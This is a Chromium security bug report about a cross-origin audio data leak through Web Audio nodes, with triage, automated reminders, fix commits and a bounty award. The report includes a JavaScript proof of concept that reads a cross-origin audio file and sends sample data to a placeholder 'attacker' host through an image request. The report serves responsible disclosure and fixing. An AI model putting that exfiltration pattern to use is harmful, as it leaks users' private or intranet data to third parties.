
Issue 313939 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2015
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security
Nag




Security: Cross-origin information disclosure through createMediaElementSource and OfflineAudioContext

Reported by amit...@gmail.com, Oct 31 2013

Issue description

VULNERABILITY DETAILS
An attacker may read an audio file (or a conversion of that file to an audio buffer), overriding cross-origin checks.
This, for example, may allow sending the contents of a file stored on the local machine or on the intranet to a remote computer controlled by the attacker.


VERSION
Chrome Version: [30.0.1599.114 stable, 30.0.1599.101 m]
Operating System: [Linux - Ubuntu  12.10 64bit, Windows 7 (VM)]

REPRODUCTION CASE
To reproduce with JavaScript:
1. Create an audio element.
2. Set its source to a media file on a different origin (i.e. a different domain) than the executing file.
3. Create a webkitOfflineAudioContext (context).
4. On the context, call createMediaElementSource with the audio element, creating a source node.
5. Connect the source node to context.destination.
6. Play the audio and start rendering the context.
7. When rendering is done, send the rendered output buffer to the attacker.

A similar vulnerability can be achieved by using webkitAudioContext and a ScriptProcessor node to collect the data from the MediaElementAudioSourceNode.

Did not find (or look for) a way to escalate this vulnerability beyond valid media files.

Following is a JavaScript reproduction of this. Change the src to a valid audio file src.
// =========== Start script
// Cross-origin media file to read. Replace with a valid audio URL on another origin.
var src = 'http://192.168.1.83:8001/webaudio/resources/sin_440Hz_-6dBFS_1s.wav';
var sampleRate = 44100.0;
var lengthInSeconds = 2;

// Offline context: renders the graph as fast as possible and hands the samples back to script.
var context = new webkitOfflineAudioContext(2, sampleRate * lengthInSeconds, sampleRate);

// Plain media element pointing at the cross-origin file; no CORS involved.
var audio = document.createElement('audio');
audio.src = src;

// Route the element's decoded audio into the offline graph.
var source = context.createMediaElementSource(audio);
source.connect(context.destination);

audio.addEventListener("playing", function(e) {
  console.log("playing", e);
  context.startRendering();
});

context.oncomplete = function(e) {
  console.log(e.renderedBuffer);
  // Just a demonstration of sending the data, sending the second sample
  var img = document.createElement('img');
  img.src = 'http://attacker/collectData?=' + e.renderedBuffer.getChannelData(0)[1];
  document.body.appendChild(img);
};

audio.play();
// ================= End script
 
Cc: abarth@chromium.org tsepez@chromium.org
Owner: kbr@chromium.org
Repro'd on Chrome 32 Linux. A quick read of http://www.w3.org/TR/webaudio/ didn't turn up spec'd origin-related behaviour for createMediaElementSource(). This does seem like a major omission in the spec, since prior to the introduction of this feature, the data would have had to have been retrieved via XHR and subject to its restrictions.

Assigning to kbr@ per webaudio/OWNERS. We can fix the bug, but the spec needs to be fixed as well.



Comment 2 by kbr@chromium.org, Nov 1 2013

Cc: kbr@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 3 by jww@chromium.org, Nov 1 2013

Labels: Security_Impact-None Security_Severity-Medium OS-All
Labels: -Security_Impact-None Security_Impact-Stable Security_Impact-Beta M-30
Wrong label - Security_Impact-None. c#0 says it impacts stable.

Comment 5 by ClusterFuzz, Nov 1 2013

Labels: reward-topanel

Comment 6 by ClusterFuzz, Nov 1 2013

Labels: Pri-1
Fixing bug priority based on security_severity-* and releaseblock-* labels.

Comment 7 by kbr@chromium.org, Nov 1 2013

Regarding changes to the Web Audio Spec: it's fine for Web Audio to play cross-origin media. It's just not okay to allow readback of that data via OfflineAudioContext. I think the only mechanism that's needed is to detect whether a cross-origin source is connected to a graph whose destination is an OfflineAudioContext, or vice versa, and to throw an exception at that point to prevent the operation.

Comment 8 by amit...@gmail.com, Nov 1 2013

Another mechanism through which a similar information disclosure is available is the ScriptProcessor node (through AudioContext or OfflineAudioContext), as I wrote in comment #0.
AnalyzerNode may disclose some information as well, but I don't know if cross origin should be prevented.

Comment 9 by amit...@gmail.com, Nov 1 2013

* AnalyserNode that is.

Comment 10 by ClusterFuzz, Nov 1 2013

Adding area label based on an intelligent guess!

- Your friendly ClusterFuzz

Comment 11 by ClusterFuzz, Nov 1 2013

Labels: Cr-Internals-Media
Adding area label based on an intelligent guess!

- Your friendly ClusterFuzz

Comment 12 Deleted


Comment 13 by ClusterFuzz, Nov 13 2013

Labels: -M-30 M-31
Migrating old milestone labels.

Comment 14 by ClusterFuzz, Nov 18 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!)

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 15 by rtoy@chromium.org, Nov 19 2013

I think I know how to solve this. Can someone provide a pointer if there's a function in Blink to determine if the origins are the same?
@rtoy - SecurityOrigin::canAccess().
Comment 17 by ClusterFuzz, Nov 28 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 18 by ClusterFuzz, Dec 7 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 19 by ClusterFuzz, Dec 15 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 20 by ClusterFuzz, Dec 23 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 21 by ClusterFuzz, Jan 1 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 22 by ClusterFuzz, Jan 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 23 by ClusterFuzz, Jan 9 2014

Labels: -M-31 M-32

Comment 24 by ClusterFuzz, Jan 17 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 25 by ClusterFuzz, Jan 26 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 26 by ClusterFuzz, Feb 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 27 by ClusterFuzz, Feb 12 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 28 by ClusterFuzz, Feb 17 2014

Labels: -M-32 M-33

Comment 29 by ClusterFuzz, Feb 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 30 by ClusterFuzz, Mar 1 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 31 by ClusterFuzz, Mar 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 32 by ClusterFuzz, Mar 17 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 33 by ClusterFuzz, Mar 26 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 34 by ClusterFuzz, Mar 31 2014

Labels: -M-33 M-34

Comment 35 by ClusterFuzz, Apr 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 36 by ClusterFuzz, Apr 12 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 37 by ClusterFuzz, Apr 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 38 by ClusterFuzz, Apr 28 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 39 by rtoy@chromium.org, Apr 29 2014

Cc: cwilso@chromium.org
+cwilso

Comment 40 by ClusterFuzz, May 13 2014

Labels: -M-34 M-35
rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 41 by ClusterFuzz, May 22 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 42 by ClusterFuzz, May 30 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 43 by ClusterFuzz, Jun 7 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 44 by ClusterFuzz, Jun 16 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 45 by ClusterFuzz, Jun 23 2014

Labels: -M-35 M-36

Comment 46 by ClusterFuzz, Jun 24 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 47 by ClusterFuzz, Jul 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.
Have you had a chance to look at this, rtoy? This bug has been open for a long while without much activity.

Comment 49 by ClusterFuzz, Jul 11 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 50 by ClusterFuzz, Jul 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 51 by ClusterFuzz, Jul 28 2014

Labels: -Security_Impact-Beta
rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.
rtoy: Any updates?

Comment 53 by ClusterFuzz, Aug 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days.

Comment 54 by rtoy@chromium.org, Aug 12 2014

Labels: WIP
Working on refactoring AudioContext to support this.

Comment 55 by ClusterFuzz, Aug 18 2014

Labels: -M-36 M-37

Comment 56 by ClusterFuzz, Sep 29 2014

Labels: -M-37 M-38

Comment 57 by ClusterFuzz, Nov 8 2014

Labels: -M-38 M-39
rtoy: Is the refactoring work for AudioContext finished? Can you provide another update? Thanks.
Labels: -WIP
What is status on the refactoring work ? If WIP, please readd WIP label.
Labels: -M-39 M-40
No more M39 patches, moving to M40.

Comment 61 by ClusterFuzz, Jan 7 2015

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 147 days.
Hi, would you mind giving an update on the progress on this bug?

Comment 63 by ClusterFuzz, Jan 29 2015

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 168 days.

Comment 64 by bugdroid1@chromium.org, Feb 4 2015

The following revision refers to this bug:
  http://src.chromium.org/viewvc/blink?view=rev&rev=189527

------------------------------------------------------------------
r189527 | rtoy@chromium.org | 2015-02-04T20:29:09.909610Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed.html?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/compatibility.js?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/media-element-cross-origin-allow.php?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin.html?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/MediaElementAudioSourceNode.cpp?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin.html?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/AudioContext.cpp?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials.html?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin-expected.txt?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/AudioContext.h?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/js-test.js?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/laughter.wav?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/media-element-audio-source-node-test.js?r1=189527&r2=189526&pathrev=189527

Output silence if the MediaElementAudioSourceNode has a different origin

See http://webaudio.github.io/web-audio-api/#security-with-mediaelementaudiosourcenode-and-cross-origin-resources

Two new tests added for the same origin and a cross origin source.

BUG= 313939 

Review URL: https://codereview.chromium.org/520433002
-----------------------------------------------------------------
Can this be marked fixed?
Cc: timwillis@chromium.org
hey rtoy@ - please advise whether we can mark this as fixed. From the patchset it looks like it's good to go, but grateful for your confirmation.

Comment 67 by rtoy@chromium.org, Feb 11 2015

Sorry, it got reverted on Friday because it was causing lots of crashes because I forgot to check a condition.  I have a fix for that and will try to land it tomorrow.  
Cool - thanks for the update.
rtoy@ - checking in here. When can you land your fix from #67?
Project Member

Comment 70 by bugdroid1@chromium.org, Feb 17 2015

The following revision refers to this bug:
  http://src.chromium.org/viewvc/blink?view=rev&rev=190367

------------------------------------------------------------------
r190367 | rtoy@chromium.org | 2015-02-17T23:49:51.787580Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials.html?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed.html?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin.html?r1=190367&r2=190366&pathrev=190367
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/MediaElementAudioSourceNode.cpp?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin.html?r1=190367&r2=190366&pathrev=190367

Check for valid webMediaPlayer() before using it.

This fixes the underlying issue in bug 456312 and reverts the revert in
https://codereview.chromium.org/905023002, adding the fix and the layout tests back.

Manually tested by visiting youtube.com and clicking on videos, before the current video is finished. This requires the Audio EQ (HTML5 Audio Equalizer for Chrome) extension to be added and enabled.

BUG=456312,  313939 

Review URL: https://codereview.chromium.org/905393002
-----------------------------------------------------------------
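The two commits above describe the fix as a policy (silence for a cross-origin source) plus a guard (a valid webMediaPlayer() before use). The following is an added illustration, not Blink's own code: it models that decision as pure functions over a constructed stand-in for the media element, so the four cases named by the layout tests (same-origin, cross-origin, cross-origin-allowed, and the missing-player crash case) can be exercised offline in Node. The origins, `corsMode`/`corsApproved` fields and the "no player yet means silence" rule are assumptions made for the model.

```javascript
// Added illustration, not Blink's code: models r189527 ("output silence if the
// MediaElementAudioSourceNode has a different origin") and the r190367 guard
// ("check for valid webMediaPlayer() before using it") as testable pure functions.

// Constructed stand-in for what the source node can observe on its <audio> element.
// `player` is null until the element has a backing media player (the crash fixed in
// r190367); `corsMode` mirrors the crossorigin attribute ('no-cors', 'anonymous',
// 'use-credentials'); `corsApproved` is whether the server's CORS response was accepted.
function makeElement({ player, responseOrigin, corsMode = 'no-cors', corsApproved = false }) {
  return { player, responseOrigin, corsMode, corsApproved };
}

// Returns true only when the graph may read the decoded samples.
function isPassthroughAllowed(pageOrigin, el) {
  // Assumption: with no media player yet there is nothing safe to read, so stay silent.
  if (!el.player) return false;
  if (el.responseOrigin === pageOrigin) return true;      // same-origin: allowed
  // Cross-origin data passes only when fetched with CORS and approved by the server.
  return el.corsMode !== 'no-cors' && el.corsApproved === true;
}

// One render quantum: copy the samples through, or emit silence of the same length.
function renderQuantum(pageOrigin, el, input) {
  const out = new Float32Array(input.length);
  if (isPassthroughAllowed(pageOrigin, el)) out.set(input);
  return out;
}

// Constructed input: 128 samples of a 440 Hz sine at 44.1 kHz, like the wav in the report.
function sine440(n = 128, rate = 44100) {
  return Float32Array.from({ length: n }, (_, i) => Math.sin((2 * Math.PI * 440 * i) / rate));
}

// Check used by the tests: an all-zero quantum means the source was silenced.
function isSilent(buf) {
  return buf.every((s) => s === 0);
}

// Constructed origins; the case names follow the layout tests listed in r190367.
const PAGE = 'http://127.0.0.1:8000';
const cases = {
  sameOrigin: makeElement({ player: {}, responseOrigin: PAGE }),
  crossOrigin: makeElement({ player: {}, responseOrigin: 'http://localhost:8000' }),
  crossOriginAllowed: makeElement({ player: {}, responseOrigin: 'http://localhost:8000',
                                    corsMode: 'anonymous', corsApproved: true }),
  noPlayerYet: makeElement({ player: null, responseOrigin: PAGE }),
};
for (const [name, el] of Object.entries(cases)) {
  console.log(name, isSilent(renderQuantum(PAGE, el, sine440())) ? 'silence' : 'audio');
}
```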
rtoy@: Is there any work remaining? Can we close this issue as fixed now? 
Status: Started

Comment 73 by rtoy@chromium.org, Feb 18 2015

#70 has the fix that we want. I think this is done now.
Labels: -M-40 M-41 Merge-Triage
Status: Fixed
Thanks!
Project Member

Comment 75 by ClusterFuzz, Feb 19 2015

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -M-41 -Merge-Triage M-42 Release-0-M42 Merge-NA
Based on revision number in #70 (190367), this is already in M42 and it doesn't make the threshold for a patch to M41.
Labels: -reward-topanel reward-unpaid reward-4000 CVE-2015-1236
Congratulations - $4000 reward for this report.

Notes from panel: Textbook infoleak with great reproduction steps.

Someone from our finance area should be in touch within the next two weeks to arrange payment. If you haven't heard from anyone by then, please contact me directly.

You'll be credited in our release notes as amitayd. Please let me know if you'd like to use another name.

Thanks,
Tim

*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 78 by amit...@gmail.com, Apr 14 2015

Thank you, great surprise this morning!

You can credit me in the release notes as Amitay Dobo.

Thanks for doing a great job on Chromium,
Amitay

Comment 79 by amit...@gmail.com, Apr 28 2015

Sorry for polluting the issue with administration, but I couldn't reveal timwil...@gmail.com's full email using the captcha and contact you directly.

I wasn't contacted yet by anyone from finance; please contact me or let someone contact me.

Best,
Amitay Dobo ( amitayd@gmail.com )
Emailed Amitay.
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 82 by ClusterFuzz, May 28 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-inprocess
Processing via our e-payment system can take up to two weeks, but the reward should be on its way to you. Thanks again for your help!
Project Member

Comment 84 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 85 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted